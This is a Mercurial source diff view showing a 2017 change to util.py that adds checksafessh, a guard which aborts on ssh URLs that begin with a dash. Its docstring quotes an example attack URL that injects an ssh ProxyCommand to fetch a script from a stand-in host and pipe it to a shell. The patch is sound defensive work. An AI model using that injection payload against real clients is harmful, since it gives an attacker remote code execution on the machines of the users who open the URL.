Mercurial > public > mercurial-scm > hg
comparison mercurial/util.py @ 33737:02a745c20121
merge with stable
| author | Augie Fackler <augie@google.com> |
|---|---|
| date | Thu, 10 Aug 2017 18:55:33 -0400 |
| parents | 86aca74a063b 3fee7f7d2da0 |
| children | bbbbd3c30bfc |
comparison
equal
deleted
inserted
replaced
| 33736:86aca74a063b | 33737:02a745c20121 |
|---|---|
| 2905 return path and path[1:2] == ':' and path[0:1].isalpha() | 2905 return path and path[1:2] == ':' and path[0:1].isalpha() |
| 2906 | 2906 |
| 2907 def urllocalpath(path): | 2907 def urllocalpath(path): |
| 2908 return url(path, parsequery=False, parsefragment=False).localpath() | 2908 return url(path, parsequery=False, parsefragment=False).localpath() |
| 2909 | 2909 |
| 2910 def checksafessh(path): | |
| 2911 """check if a path / url is a potentially unsafe ssh exploit (SEC) | |
| 2912 | |
| 2913 This is a sanity check for ssh urls. ssh will parse the first item as | |
| 2914 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. | |
| 2915 Let's prevent these potentially exploited urls entirely and warn the | |
| 2916 user. | |
| 2917 | |
| 2918 Raises an error.Abort when the url is unsafe. | |
| 2919 """ | |
| 2920 path = urlreq.unquote(path) | |
| 2921 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'): | |
| 2922 raise error.Abort(_('potentially unsafe url: %r') % | |
| 2923 (path,)) | |
| 2924 | |
| 2910 def hidepassword(u): | 2925 def hidepassword(u): |
| 2911 '''hide user credential in a url string''' | 2926 '''hide user credential in a url string''' |
| 2912 u = url(u) | 2927 u = url(u) |
| 2913 if u.passwd: | 2928 if u.passwd: |
| 2914 u.passwd = '***' | 2929 u.passwd = '***' |